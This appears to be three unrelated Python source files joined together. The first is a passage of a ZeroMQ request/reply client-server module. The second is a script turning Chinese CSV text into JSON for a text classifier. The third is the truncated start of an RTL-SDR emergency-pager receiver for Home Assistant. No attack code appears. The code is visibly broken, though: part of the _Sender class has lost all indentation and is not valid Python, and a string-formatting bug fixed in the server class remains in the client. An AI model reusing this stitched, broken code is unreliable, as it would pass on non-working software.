            self.send = self.sock.send_multipart
            self.recv = self.sock.recv_multipart
        elif self.dtype == 'pyobj':
            self.send = partial(self.sock.send_pyobj,
                                protocol=zprocess.PICKLE_PROTOCOL)
            self.recv = self.sock.recv_pyobj
        else:
            # Fixed: previously the % operator bound to the second string
            # (which has no conversion specifier), raising TypeError
            # before the ValueError could be constructed.
            msg = ("invalid dtype %s, must be 'raw', 'string', "
                   "'multipart' or 'pyobj'" % str(self.dtype))
            raise ValueError(msg)
        self.mainloop_thread = threading.Thread(target=self.mainloop)
        self.mainloop_thread.daemon = True
        self.mainloop_thread.start()

    def setup_auth(self, context):
        """Deprecated. To be overridden by subclasses setting up their
        own authentication. If present in a subclass, this will be called
        and no shared secret authentication will be used."""
        pass

    def timeout(self):
        """A function to call every self.timeout_interval seconds in the same
        thread as the handler. Subclasses should implement this for cleanups
        and the like."""
        pass

    def shutdown_on_interrupt(self):
        """Block until ctrl-C (or mainloop crash), then shut down."""
        try:
            # This while loop could be replaced with a simple
            # self._crashed.wait(), but there is a bug such that wait()
            # cannot be interrupted with ctrl-C on Windows, see
            # https://bugs.python.org/issue35935. time.sleep() can be
            # interrupted though, so we sleep and check once a second
            # whether the server crashed.
            while True:
                time.sleep(1)
                # Return if mainloop crashes
                if self._crashed.is_set():
                    msg = "Server mainloop crashed"
                    raise RuntimeError(msg)
        except KeyboardInterrupt:
            print('KeyboardInterrupt, stopping.', file=sys.stderr)
        finally:
            self.shutdown()

    def mainloop(self):
        """Receive requests, dispatch to handler(), reply.  Handler
        exceptions are re-raised in a separate thread (so the server
        keeps running) and, for REP sockets, reported to the client as an
        exception object."""
        if self.timeout_interval is not None:
            next_timeout = monotonic() + self.timeout_interval
        else:
            next_timeout = None
        try:
            while True:
                if next_timeout is not None:
                    timeout = next_timeout - monotonic()
                    timeout = max(0, timeout)
                    events = dict(self.poller.poll(int(timeout * 1000)))
                    if not events:
                        # Timed out. Run our timeout method:
                        try:
                            self.timeout()
                        except Exception:
                            # Raise the exception in a separate thread so
                            # that the server keeps running:
                            exc_info = sys.exc_info()
                            raise_exception_in_thread(exc_info)
                        # Compute next timeout time:
                        next_timeout = monotonic() + self.timeout_interval
                        continue
                else:
                    events = dict(self.poller.poll())
                if self._shutdown_sock in events:
                    assert self._shutdown_sock.recv() == b'stop'
                    break
                request_data = self.recv()
                try:
                    response_data = self.handler(request_data)
                    if response_data is self.NO_RESPONSE:
                        # Handler already replied via self.send():
                        continue
                    if self.pull_only and response_data is not None:
                        msg = ("Pull-only server handler() method returned " +
                               "non-None value %s. Ignoring." % str(response_data))
                        raise ValueError(msg)
                    response_data = _typecheck_or_convert_data(response_data,
                                                               self.dtype)
                except Exception:
                    # Raise the exception in a separate thread so that the
                    # server keeps running:
                    exc_info = sys.exc_info()
                    raise_exception_in_thread(exc_info)
                    exception_string = traceback.format_exc()
                    if not self.pull_only:
                        # Send the error to the client:
                        msg = ("The server had an unhandled exception whilst " +
                               "processing the request:\n%s" % str(exception_string))
                        # Prefer an instance of the same exception type, but
                        # fall back to RuntimeError for exotic constructors:
                        try:
                            response_data = exc_info[0](msg)
                        except Exception:
                            response_data = RuntimeError(msg)
                        if self.dtype == 'raw':
                            response_data = str(response_data).encode('utf8')
                        elif self.dtype == 'multipart':
                            response_data = [str(response_data).encode('utf8')]
                        elif self.dtype == 'string':
                            response_data = str(response_data)
                        response_data = _typecheck_or_convert_data(response_data,
                                                                   self.dtype)
                if not self.pull_only:
                    self.send(response_data)
        except Exception:
            self._crashed.set()
            raise

    def shutdown(self):
        """Stop the mainloop thread and close the sockets."""
        self.stopping = True
        sock = self.context.socket(zmq.PUSH)
        sock.connect(self._shutdown_endpoint)
        sock.send(b'stop')
        self.mainloop_thread.join()
        # NOTE(review): linger expects milliseconds; True is treated as 1 --
        # kept as-is to preserve behavior, but probably meant a real timeout.
        sock.close(linger=True)
        self.sock.close(linger=False)
        self.stopping = False

    def handler(self, request_data):
        """To be overridden by subclasses. This is an example
        implementation."""
        response = ('This is an example ZMQServer. ' +
                    'Your request was %s.' % str(request_data))
        return response
class _Sender(object):
"""Wrapper around a zmq.PUSH or zmq.REQ socket, returning a callable
for sending (and optionally receiving data)"""
def __init__(
self,
dtype='pyobj',
push_only=False,
shared_secret=None,
allow_insecure=False,
interruptor=None,
):
self.local = threading.local()
self.dtype = dtype
self.push_only = push_only
self.shared_secret = shared_secret
self.allow_insecure = allow_insecure
self.interruptor = interruptor
assert self.interruptor is not None # Should be passed in by parent ZMQClient
def new_socket(self, host, port, timeout=5, interruptor=None):
# Every time the REQ/REP cadence is broken, we need to create
# and connect a new socket to get it back on track. Also, we have
# a separate socket for each thread. Also a new socket if there
# is a different host or port. We also create a poller and register
# the socket to it.
if timeout is not None:
timeout *= 1000 # convert to ms
self.local.host = gethostbyname(host)
self.local.port = int(port)
context = SecureContext.instance(shared_secret=self.shared_secret)
if self.push_only:
self.local.sock = context.socket(
zmq.PUSH, allow_insecure=self.allow_insecure
)
else:
self.local.sock = context.socket(
zmq.REQ, allow_insecure=self.allow_insecure
)
self.local.poller = zmq.Poller()
self.local.poller.register(self.local.sock)
try:
# Allow up to 1 second to send unsent messages on socket shutdown:
self.local.sock.setsockopt(zmq.LINGER, 1000)
self.local.sock.connect(
'tcp://%s:%d' % (self.local.host, self.local.port),
timeout=timeout,
interruptor=interruptor,
)
# Different send/recv methods depending on the desired protocol:
if self.dtype == 'raw':
self.local.send = self.local.sock.send
self.local.recv = self.local.sock.recv
elif self.dtype == 'string':
self.local.send = self.local.sock.send_string
self.local.recv = self.local.sock.recv_string
elif self.dtype == 'multipart':
self.local.send = self.local.sock.send_multipart
self.local.recv = self.local.sock.recv_multipart
elif self.dtype == 'pyobj':
self.local.send = partial(
self.local.sock.send_pyobj, protocol=zprocess.PICKLE_PROTOCOL
)
self.local.recv = self.local.sock.recv_pyobj
else:
msg = (
"invalid dtype %s, must be 'raw', 'string', "
+ "'multipart' or 'pyobj'" % str(self.dtype)
)
raise ValueError(msg)
except:
# Didn't work, don't keep it:
del self.local.sock
del self.local.poller
raise
    def __call__(
        self,
        port,
        host='localhost',
        data=None,
        timeout=5,
        interruptor=None,
        raise_server_exceptions=True,
    ):
        """If self.push_only, send data on the push socket.
        Otherwise, uses reliable request-reply to send data to a zmq REP
        socket, and return the reply. If raise_server_exceptions set to False, then
        returns exception objects from the server instead of raising them."""
        # We cache the socket so as to not exhaust ourselves of tcp
        # ports. However if a different server is in use, we need a new
        # socket. Also if we don't have a socket, we also need a new one:
        if (
            not hasattr(self.local, 'sock')
            or gethostbyname(host) != self.local.host
            or int(port) != self.local.port
        ):
            self.new_socket(host, port, timeout, interruptor=interruptor)
        data = _typecheck_or_convert_data(data, self.dtype)
        if timeout is not None:
            # Deadline for the send phase, measured on a monotonic clock:
            deadline = monotonic() + timeout
        if interruptor is None:
            # Fall back to the interruptor shared with the parent ZMQClient:
            interruptor = self.interruptor
        try:
            # Subscribe so an interrupt() elsewhere wakes our poll calls below.
            # NOTE(review): if subscribe() itself raises, interruption_sock is
            # unbound and the finally clause below raises NameError -- confirm.
            interruption_sock = interruptor.subscribe()
            self.local.poller.register(interruption_sock)
            # Attempt to send until interruption or timeout:
            while True:
                if timeout is not None:
                    remaining = max(0, (deadline - monotonic()) * 1000)  # ms
                else:
                    remaining = None
                events = dict(self.local.poller.poll(remaining))
                if not events:
                    raise TimeoutError('Could not send data to server: timed out')
                if interruption_sock in events:
                    raise Interrupted(interruption_sock.recv().decode('utf8'))
                assert events[self.local.sock] == zmq.POLLOUT
                try:
                    self.local.send(data, zmq.NOBLOCK)
                    if self.push_only:
                        # PUSH sockets get no reply, so we are done here:
                        return
                    else:
                        break
                except zmq.ZMQError:
                    # Queue became full or we disconnected or something, keep
                    # polling:
                    continue
            # Separate timeout for send() and recv()
            if timeout is not None:
                remaining = max(0, timeout * 1000)  # ms
            # Wait for response until interrupt or timeout:
            events = dict(self.local.poller.poll(remaining))
            if not events:
                raise TimeoutError('No response from server: timed out')
            if interruption_sock in events:
                raise Interrupted(interruption_sock.recv().decode('utf8'))
            assert events[self.local.sock] == zmq.POLLIN
            response = self.local.recv()
            # The server may ship back an exception object; re-raise it here
            # unless the caller opted out:
            if isinstance(response, Exception) and raise_server_exceptions:
                raise response
            return response
        except:
            # Any exceptions, we want to stop using this socket: the REQ/REP
            # cadence is broken, so the next call will make a fresh one.
            self.local.sock.close(linger=0)
            del self.local.sock
            raise
        finally:
            self.local.poller.unregister(interruption_sock)
            interruptor.unsubscribe()
class ZMQClient(object):
    """Wrapper around zmq REQ or PUSH socket"""

    def __init__(self, shared_secret=None, allow_insecure=False):
        self.shared_secret = shared_secret
        self.allow_insecure = allow_insecure
        self.interruptor = Interruptor()
        sender_kwargs = {
            'shared_secret': shared_secret,
            'allow_insecure': allow_insecure,
            'interruptor': self.interruptor,
        }
        # One sender per wire format: request/reply flavours first, then the
        # fire-and-forget push flavours.
        for attr, dtype in (('get', 'pyobj'),
                            ('get_multipart', 'multipart'),
                            ('get_string', 'string'),
                            ('get_raw', 'raw')):
            setattr(self, attr, _Sender(dtype, **sender_kwargs))
        for attr, dtype in (('push', 'pyobj'),
                            ('push_multipart', 'multipart'),
                            ('push_raw', 'raw'),
                            ('push_string', 'string')):
            setattr(self, attr, _Sender(dtype, push_only=True, **sender_kwargs))

    def interrupt(self, reason=None):
        """Interrupt any current and future get*()/push*() calls, causing them to raise
        Interrupted(reason) until clear_interrupt() is called. Note that if
        get*()/push*() was called with an externally created Interruptor object, then
        this method will not interrupt that call, and Interruptor.set() will need to be
        called on the given interruptor object instead."""
        self.interruptor.set(reason=reason)

    def clear_interrupt(self):
        """Clear our internal Interruptor object so that future get*()/push*() calls can
        proceed as normal."""
        self.interruptor.clear()
# Backwards compatibility follows:
# Default to on all interfaces and allow insecure connections.
_ZMQServer = ZMQServer


class ZMQServer(_ZMQServer):
    """Wrapper around a zmq.REP or zmq.PULL socket"""

    def __init__(self, port, dtype=None, pull_only=False,
                 bind_address='tcp://*', shared_secret=None,
                 allow_insecure=True, **kwargs):
        # Accept the legacy keyword "type" as an alias for "dtype":
        dtype = kwargs.pop('type', dtype)
        if kwargs:
            raise ValueError('too many keyword arguments')
        elif dtype is None:
            dtype = 'pyobj'
        _ZMQServer.__init__(self, port, dtype=dtype, pull_only=pull_only,
                            bind_address=bind_address,
                            shared_secret=shared_secret,
                            allow_insecure=allow_insecure,
                            **kwargs)
# methods for a default insecure client
# Module-level convenience client created at import time so callers can use
# zmq_get()/zmq_push() etc. without instantiating ZMQClient themselves.
_default_client = ZMQClient(allow_insecure=True)
zmq_get = _default_client.get
zmq_get_multipart = _default_client.get_multipart
zmq_get_string = _default_client.get_string
zmq_get_raw = _default_client.get_raw
zmq_push = _default_client.push
zmq_push_multipart = _default_client.push_multipart
zmq_push_string = _default_client.push_string
zmq_push_raw = _default_client.push_raw
# Public API of this module:
__all__ = ['ZMQServer', 'ZMQClient',
           'zmq_get', 'zmq_get_multipart', 'zmq_get_string', 'zmq_get_raw',
           'zmq_push', 'zmq_push_multipart', 'zmq_push_string', 'zmq_push_raw']
|
df2json.py | """
数据预处理功能,将csv格式的数据处理成腾讯文本分类包NeuralClassifier的数据格式
之前的数据格式:csv文件,字段为label item
目标的数据处理格式:
JSON example:
{
"doc_label": ["Computer--MachineLearning--DeepLearning", "Neuro--ComputationalNeuro"],
"doc_token": ["I", "love", "deep", "learning"],
"doc_keyword": ["deep learning"],
"doc_topic": ["AI", "Machine learning"]
}
其中doc_keyword和doc_topic可选
author:liushuming(80252631)
date:20200321
"""
import numpy as np
import pandas as pd
import jieba
import jieba.analyse
import codecs
import pkuseg
import sys
import json
import re
import threading
from time import ctime,sleep
import os
input_path ="data/"
file_name1 = input_path+"train_v12.csv"
# NOTE(review): error_bad_lines was deprecated in pandas 1.3 and removed in
# 2.0 (replacement: on_bad_lines='skip') -- this code requires an older pandas.
df1 = pd.read_csv(file_name1,error_bad_lines=False)
# Name the two columns: class label and raw text
df1.columns = ['doc_label', 'doc_token']
df1 = df1[['doc_label', 'doc_token']]
df1.head(3)
# Split into training and validation sets (80/20)
from sklearn.model_selection import train_test_split
train_data_df, test_data_df= train_test_split(df1, test_size=0.2)
#(train_data_df.shape)
#print(test_data_df.shape)
file_name2 = input_path+"test_v12.csv"
df2 = pd.read_csv(file_name2,error_bad_lines=False)
df2.columns = ['doc_label', 'doc_token']
df2 = df2[['doc_label', 'doc_token']]
df2.head(3)
"""
data_test.csv中数据格式是这样的:
doc_label doc_token
0 是要在车里唱歌么?居然还加了隔音棉!
和之前咱们使用bert分类器的数据格式是一样的,之前的是
label item
"""
# This text-classification toolkit needs Chinese word segmentation, done
# with either jieba or PKU's pkuseg, followed by stop-word removal (below).
def stop_words(path):
    """Return the stop-word list read from *path* (UTF-8, one word per line)."""
    words = []
    with open(path, encoding='utf-8') as handle:
        for line in handle:
            words.append(line.strip())
    return words
# Tokenize with jieba (accurate mode, not full mode).
def tokenize_by_jieba(doc_token):
    """Return a jieba token generator for *doc_token*."""
    return jieba.cut(doc_token, cut_all=False)
# Tokenize with pkuseg (one record at a time).
def tokenize_by_pkuseg(doc_token):
    """Segment *doc_token* with pkuseg's default model and return the token list.

    Bug fix: the original first assigned ``doc_token.split(" ")`` and then
    immediately overwrote it with the pkuseg result -- the dead assignment
    has been removed.
    NOTE(review): this builds a fresh pkuseg model on every call, which is
    very slow; consider caching the model at module level.
    """
    return pkuseg.pkuseg().cut(doc_token)  # load default model and segment
"""
将dataframe转化成json数据
使用jieba分词
input: dataframe
数据格式:['doc_label', 'doc_token']
tokenize_strategy:可以选“jieba”或者“pkuseg”
output: json数据
{
"doc_label": ["Computer--MachineLearning--DeepLearning", "Neuro--ComputationalNeuro"],
"doc_token": ["I", "love", "deep", "learning"],
"doc_keyword": ["deep learning"],
"doc_topic": ["AI", "Machine learning"]
}
"""
def data_process(df, outfile, tokenize_strategy):
    """Convert a dataframe of ['doc_label', 'doc_token'] rows to JSON lines.

    Each row becomes one JSON object with keys doc_label / doc_token /
    doc_keyword / doc_topic (NeuralClassifier's input format), appended to
    *outfile*. *tokenize_strategy* selects the tokenizer: 'jieba' or
    'pkuseg'.

    Bug fix: an unknown strategy used to hit ``seg_list = seg_list`` and
    crash with UnboundLocalError; it now raises a clear ValueError.
    Performance fix: the stop-word file was re-read from disk for every
    single row; it is now loaded once and kept as a set for O(1) lookups.
    """
    print('""""""""""data_process start"""""""""""""')
    processId = os.getpid()
    # threading.currentThread() is deprecated; current_thread() is identical
    threadId = threading.current_thread().ident
    print(u'%s号进程任务 : '%processId)
    print(u'%s号线程任务 : '%threadId)
    totalItems = len(df.index)
    print('""""""""""print totalItems start"""""""""""""')
    print(totalItems)
    print('""""""""""print totalItems end"""""""""""""')
    # Only keep CJK ideographs, ASCII letters and digits (compiled once):
    keep_chars = re.compile("[^0-9A-Za-z\u4e00-\u9fa5]")
    stopword_set = None  # loaded lazily, once, instead of once per row
    with open(outfile, "w+", buffering=20, encoding='utf-8') as f:
        count = 0
        for indexs in df.index:
            print(u'%s号进程任务 : '%processId)
            print(u'%s号线程任务 : '%threadId)
            count += 1
            print('""""""""""doc_token start"""""""""""""')
            tmpl = 'count/Total: {curentCount} / {items}!'
            print(tmpl.format(curentCount = count,items = totalItems))
            print('""""""""""doc_token end"""""""""""""')
            dict1 = {}
            dict1['doc_label'] = [str(df.loc[indexs].values[0])]
            doc_token = df.loc[indexs].values[1]
            doc_token = keep_chars.sub('', doc_token)
            # Chinese word segmentation ('jieba' or 'pkuseg'):
            if tokenize_strategy == 'jieba':
                seg_list = tokenize_by_jieba(doc_token)
            elif tokenize_strategy == 'pkuseg':
                seg_list = tokenize_by_pkuseg(doc_token)
            else:
                raise ValueError(
                    "unknown tokenize_strategy: %r (use 'jieba' or 'pkuseg')"
                    % tokenize_strategy)
            # Load the stop-word list on first use only:
            if stopword_set is None:
                stopword_set = set(stop_words(input_path + 'stop_words.txt'))
            content = [x for x in seg_list if x not in stopword_set]
            dict1['doc_token'] = content
            dict1['doc_keyword'] = []
            dict1['doc_topic'] = []
            print('""""""""""doc_label doc_token start"""""""""""""')
            print(u'doc_label: %s'%dict1['doc_label'] )
            print(u'doc_token: %s'%dict1['doc_token'])
            print('""""""""""doc_label doc_token end"""""""""""""')
            # Serialize and append one JSON object per line:
            json_str = json.dumps(dict1, ensure_ascii=False)
            f.write('%s\n' % json_str)
    print('""""""""""data_process end"""""""""""""')
# pkuseg is a special case (slow per-call model init); jieba is used here to
# build the model-training datasets, after which the model is trained to
# check that the preprocessing succeeded.
# data_process(train_data_df, input_path + 'rcv2_train.json', "jieba")
# data_process(test_data_df, input_path + 'rcv2_dev.json', "jieba")
# data_process(df2, input_path + 'rcv2_test.json', "jieba")
# One worker thread per output file: train / dev / test.
# NOTE(review): the three threads run jieba concurrently; confirm jieba's
# lazy dictionary initialization is thread-safe in the pinned version.
threads = []
t1 = threading.Thread(target=data_process,args=(train_data_df, input_path + 'rcv2_train.json', "jieba"))
threads.append(t1)
t2 = threading.Thread(target=data_process,args=(test_data_df, input_path + 'rcv2_dev.json', "jieba"))
threads.append(t2)
t3 = threading.Thread(target=data_process,args=(df2, input_path + 'rcv2_test.json', "jieba"))
threads.append(t3)
if __name__ == '__main__':
    # Start every worker as a daemon thread, then wait for all of them.
    # (Daemon status is moot here since we join, but it is preserved.)
    for t in threads:
        # Modernization: Thread.setDaemon() is deprecated; assigning the
        # .daemon attribute is the documented equivalent.
        t.daemon = True
        t.start()
    for t in threads:
        t.join()
    print("all over %s" %ctime())
p2000.py | #!/usr/bin/env python3
"""RTL-SDR P2000 Receiver for Home Assistant."""
import calendar
import configparser
import fnmatch
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
from datetime import datetime
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
import geopy.distance
import paho.mqtt.client as mqtt
import requests
from opencage.geocoder import InvalidInputError, OpenCageGeocode, RateLimitExceededError
VERSION = "0.1.0"
CFGFILE = "config.ini"
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
    """Override original code to fix bug with not deleting old logfiles."""

    def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
        # Coerce interval/backupCount so string values from a config file work
        super().__init__(
            filename=filename,
            when=when,
            interval=int(interval),
            backupCount=int(backupCount),
        )

    def getFilesToDelete(self):
        """Find all logfiles present."""
        # Rotated files are named '<base>.<suffix>'; collect those whose
        # suffix matches the base class's extMatch regex.
        dirname, basename = os.path.split(self.baseFilename)
        filenames = os.listdir(dirname)
        result = []
        prefix = basename + "."
        plen = len(prefix)
        for filename in filenames:
            if filename[:plen] == prefix:
                suffix = filename[plen:]
                if self.extMatch.match(suffix):
                    result.append(os.path.join(dirname, filename))
        result.sort()
        if len(result) < self.backupCount:
            # Fewer rotated files than the retention limit: delete nothing
            result = []
        else:
            # Sorted names are chronological; return all but the newest
            # backupCount files for deletion
            result = result[: len(result) - self.backupCount]
        return result

    def doRollover(self):
        """Delete old logfiles but keep latest backupCount amount."""
        super().doRollover()
        # Re-do the rollover bookkeeping: close the stream, rename the live
        # file to a dated name, prune old logs, reopen, and recompute the
        # next rollover time.
        # NOTE(review): super().doRollover() already rotates once; this
        # second pass looks like a deliberate workaround for the deletion
        # bug mentioned in the class docstring -- confirm before changing.
        self.close()
        timetuple = time.localtime(time.time())
        dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
        if os.path.exists(dfn):
            os.remove(dfn)
        os.rename(self.baseFilename, dfn)
        if self.backupCount > 0:
            for oldlog in self.getFilesToDelete():
                os.remove(oldlog)
        self.stream = open(self.baseFilename, "w")
        currenttime = int(time.time())
        # Advance rolloverAt until it lies in the future
        newrolloverat = self.computeRollover(currenttime)
        while newrolloverat <= currenttime:
            newrolloverat = newrolloverat + self.interval
        self.rolloverAt = newrolloverat
class Logger:
    """Thin wrapper around the root logger: rotated file plus console output."""

    my_logger = None

    def __init__(self, datadir, logstokeep, debug_enabled):
        """Configure the root logger with a rotating file handler and a console handler."""
        self.my_logger = logging.getLogger()
        self.my_logger.setLevel(logging.DEBUG if debug_enabled else logging.INFO)
        self.my_logger.propagate = False
        date_fmt = "%Y-%m-%d %H:%M:%S"
        line_fmt = "%(asctime)s - (%(threadName)-10s) - %(filename)s - %(levelname)s - %(message)s"
        formatter = logging.Formatter(line_fmt, date_fmt)
        console_formatter = logging.Formatter(line_fmt, date_fmt)
        # Create the log directory if it does not exist yet
        if not os.path.exists(f"{datadir}/logs"):
            os.makedirs(f"{datadir}/logs")
        # File handler: rotated daily, keeping `logstokeep` backups
        file_handle = TimedRotatingFileHandler(
            filename=f"{datadir}/logs/p2000.log", backupCount=logstokeep
        )
        file_handle.setFormatter(formatter)
        self.my_logger.addHandler(file_handle)
        # Console handler
        console_handle = logging.StreamHandler()
        console_handle.setFormatter(console_formatter)
        self.my_logger.addHandler(console_handle)

    def log(self, message, level="info"):
        """Dispatch *message* to the matching log level (unknown levels are dropped)."""
        dispatch = {
            "info": self.my_logger.info,
            "warning": self.my_logger.warning,
            "error": self.my_logger.error,
            "debug": self.my_logger.debug,
        }
        emit = dispatch.get(level)
        if emit is not None:
            emit(message)

    def info(self, message):
        """Log at info level."""
        self.log(message, "info")

    def warning(self, message):
        """Log at warning level."""
        self.log(message, "warning")

    def error(self, message):
        """Log at error level."""
        self.log(message, "error")

    def debug(self, message):
        """Log at debug level."""
        self.log(message, "debug")
class MessageItem:
    """Value object holding every field parsed from one P2000 FLEX message."""

    def __init__(self):
        # Bug fix: the original assigned datetime.now().strftime(...) to
        # self.timestamp and immediately overwrote it with "" -- the dead
        # assignment has been removed (the final state is unchanged; the
        # real timestamp is filled in later from the parsed FLEX line).
        self.message_raw = ""                 # raw FLEX line as received
        self.timestamp = ""                   # timestamp field from the message
        self.timereceived = time.monotonic()  # monotonic arrival time
        self.groupid = ""
        self.receivers = ""
        self.capcodes = []                    # list of capcode strings
        self.body = ""                        # human-readable message text
        self.location = ""
        self.postalcode = ""
        self.city = ""
        self.address = ""
        self.street = ""
        self.region = ""
        self.priority = 0                     # 0 = unknown, 1..4 from p2000_get_prio
        self.disciplines = ""
        self.remarks = ""
        self.longitude = ""
        self.latitude = ""
        self.opencage = ""                    # geocoder status/result text
        self.mapurl = ""
        self.distance = ""                    # km from home, set by post_data
        self.friendly_name = ""
def load_config(filename):
    """Create a default config file or load (and upgrade) an existing one.

    Returns the parsed ConfigParser on success. When no config exists yet, a
    default one is written and False is returned so the caller can tell the
    user to edit it first.
    """
    config = configparser.ConfigParser()
    # Bug fix: the filename argument was previously ignored (overwritten
    # with a hard-coded value); resolve it against the data directory.
    filename = f"{datadir}/{filename}"
    if config.read(filename):
        # Upgrade old configs: the legacy home-assistant 'sensorname'
        # option is replaced by a dedicated [sensor_p2000] section.
        if config.has_option("home-assistant", "sensorname"):
            config.add_section("sensor_p2000")
            config.set(
                "sensor_p2000",
                "zone_latitude","52.37602835336776"
            )
            config.set(
                "sensor_p2000",
                "zone_longitude","4.902929475786443"
            )
            config.set(
                "sensor_p2000",
                "zone_radius","0"
            )
            config.remove_option("home-assistant", "sensorname")
            with open(filename, "w+") as cfgfile:
                config.write(cfgfile)
        return config
    # No existing config: write defaults for every section.
    config["main"] = {"debug": False,
                      "logtofile": False
                      }
    config["rtl-sdr"] = {
        "cmd": "rtl_fm -f 169.65M -M fm -s 22050 | multimon-ng -a FLEX -t raw -"
    }
    config["home-assistant"] = {
        "enabled": True,
        "baseurl": "http://homeassistant.local:8123",
        "token": "Place your Long-Lived Access Token here"
    }
    config["mqtt"] = {
        "enabled": False,
        "mqtt_server": "192.168.1.100",
        "mqtt_port": 1883,
        "mqtt_user": "mqttuser",
        "mqtt_password": "somepassword",
        "mqtt_topic": "p2000"
    }
    config["opencage"] = {
        "enabled": False,
        "token": "Place your OpenCage API Token here"
    }
    config["sensor_p2000"] = {
        "zone_latitude": "52.37602835336776",
        "zone_longitude": "4.902929475786443",
        "zone_radius": "0"
    }
    with open(filename, "w") as configfile:
        config.write(configfile)
    # NOTE(review): returning False here means callers must not use the
    # result as a ConfigParser -- see the getboolean() calls at module level.
    return False
def check_requirements(self):
    """Check that rtl_fm and multimon-ng are installed; return True when both are found."""
    self.logger.info("Checking if required software is installed")

    def _stderr_of(command):
        # Run the command in a shell and capture its stderr as text.
        proc = subprocess.Popen(
            command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
        )
        _, err_bytes = proc.communicate()
        return err_bytes.decode("utf8")

    # rtl_fm (RTL-SDR package)
    err_text = _stderr_of("rtl_fm")
    if "not found" in err_text or "not recognized" in err_text:
        self.logger.debug("rtl_fm command not found, please install RTL-SDR software")
        return False
    self.logger.debug("rtl_fm is found")
    # multimon-ng decoder
    err_text = _stderr_of("multimon-ng -h")
    if "not found" in err_text:
        self.logger.error(
            "multimon-ng not found, please install the multimon-ng package"
        )
        return False
    self.logger.debug("multimon-ng is found")
    return True
def load_capcodes_dict(self, filename):
    """Load a capcode CSV (capcode,col1,col2,...) into a nested dict.

    The first row is the header; its first column (the capcode itself) is
    skipped. Returns {capcode: {column_name: value, ...}}; an unreadable or
    malformed file yields an empty dict.
    """
    capcodes = {}
    # Bug fix: the filename argument was previously ignored (overwritten
    # with a hard-coded value); resolve it against the data directory.
    filename = f"{datadir}/{filename}"
    try:
        self.logger.info("Loading data from '{}'".format(filename))
        with open(filename, "r") as csv_file:
            csv_list = [
                [val.strip() for val in r.split(",")] for r in csv_file.readlines()
            ]
        (_, *header), *data = csv_list
        for row in data:
            # Renamed loop variables: the original shadowed the outer `key`
            # inside the comprehension, which read correctly but confusingly.
            capcode, *values = row
            capcodes[capcode] = dict(zip(header, values))
        self.logger.info("{} records loaded".format(len(capcodes)))
    except (KeyError, ValueError):
        # Bug fix: an empty file fails the header unpack with ValueError,
        # which the original 'except KeyError' never caught.
        self.logger.error(f"Could not parse file contents of: {filename}")
    except OSError:
        self.logger.info(f"Could not open/read file: {filename}, ignoring filter")
    return capcodes
def load_capcodes_filter_dict(self, filename):
    """Load capcode ignore/match data into {capcode: description}.

    Lines starting with '#' are comments. A data line is either
    'capcode,description' or a bare capcode (description 'NO DESCR').
    Returns {} (possibly partial) when the file is missing or unparsable.
    """
    capcodes = dict()
    # Bug fix: the filename argument was previously ignored (overwritten
    # with a hard-coded value); resolve it against the data directory.
    filename = f"{datadir}/{filename}"
    try:
        self.logger.info("Loading data from '{}'".format(filename))
        with open(filename, "r") as text_file:
            lines = text_file.readlines()
        for item in lines:
            if item.startswith("#"):
                continue
            fields = item.split(",")
            if len(fields) == 2:
                capcodes[fields[0].strip()] = fields[1].strip()
            elif len(fields) == 1:
                capcodes[fields[0].strip()] = "NO DESCR"
        self.logger.info("{} records loaded".format(len(capcodes)))
        return capcodes
    except KeyError:
        self.logger.debug(f"Could not parse file contents of: {filename}")
    except OSError:
        self.logger.debug(f"Could not open/read file: {filename}, ignoring filter")
    return capcodes
def load_list(self, filename):
    """Load non-empty, non-comment lines ('#' or ';' prefix) into a list.

    Returns [] when the file is missing or unreadable.
    """
    tmplist = []
    # Bug fix: the filename argument was previously ignored (overwritten
    # with a hard-coded value); resolve it against the data directory.
    filename = f"{datadir}/{filename}"
    try:
        self.logger.info("Loading data from '{}'".format(filename))
        with open(filename, "r") as text_file:
            stripped = (line.strip() for line in text_file)
            tmplist = [
                line for line in stripped
                if line and not line.startswith(("#", ";"))
            ]
        self.logger.info("{} records loaded".format(len(tmplist)))
        return tmplist
    except KeyError:
        self.logger.debug(f"Could not parse file contents of: {filename}")
    except OSError:
        self.logger.debug(f"Could not open/read file: {filename}")
    return tmplist
def check_filter(mylist, text):
    """Return True when *text* matches any glob pattern in *mylist*.

    An unloaded/empty filter list allows everything.
    """
    if not mylist:
        return True
    return any(fnmatch.fnmatch(text, pattern) for pattern in mylist)
def check_filter_with_list(searchlist, list_to_be_searched):
    """Return True when any entry of *list_to_be_searched* matches *searchlist*.

    Mirrors check_filter(): an empty *searchlist* allows everything.
    """
    # If list is not loaded or empty allow all
    if len(searchlist) == 0:
        return True
    # Idiom fix: test truthiness directly instead of comparing '== True'.
    for searchedtext in list_to_be_searched:
        if check_filter(searchlist, searchedtext):
            return True
    return False
def to_local_datetime(utc_dt):
    """Convert a 'YYYY-MM-DD HH:MM:SS' UTC string to a local-time ctime string."""
    parsed = time.strptime(utc_dt, "%Y-%m-%d %H:%M:%S")
    epoch = calendar.timegm(parsed)
    return time.ctime(epoch)
def p2000_get_prio(message):
    """Scan *message* for priority markers and return the level (1-4, 0 = none)."""
    prio_patterns = (
        (1, r"^A\s?1|\s?A\s?1|PRIO\s?1|^P\s?1"),
        (2, r"^A\s?2|\s?A\s?2|PRIO\s?2|^P\s?2"),
        (3, r"^B\s?1|^B\s?2|^B\s?3|PRIO\s?3|^P\s?3"),
        (4, r"^PRIO\s?4|^P\s?4"),
    )
    # First matching level wins, highest priority checked first.
    for level, pattern in prio_patterns:
        if re.search(pattern, message, re.IGNORECASE):
            return level
    return 0
# Log all messages sent or ignored to a logfile in folder logfiles
def log2file(logmessage):
    """Append *logmessage* plus a newline to today's logfile in 'logfiles/'."""
    print("log2file called")
    datestamp = time.strftime("%Y%m%d")
    logfilename = 'logfiles/p2000-log-' + datestamp + '.log'
    # Bug fix: the original opened the file twice and never closed either
    # handle (relying on GC); use a single context-managed append instead.
    with open(logfilename, 'a') as logfile:
        logfile.write(logmessage)
        logfile.write("\n")
# Set and change to program directory
datadir = os.path.dirname(os.path.realpath(__file__))
os.chdir(datadir)
# Load configuration (a ConfigParser, or False when a fresh default file
# was just written)
config = load_config(CFGFILE)
# Init logging
# NOTE(review): if load_config() returned False, config.getboolean() below
